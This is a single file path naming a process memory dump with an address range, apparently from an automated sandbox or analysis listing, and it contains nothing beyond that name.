memory/4972-96-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp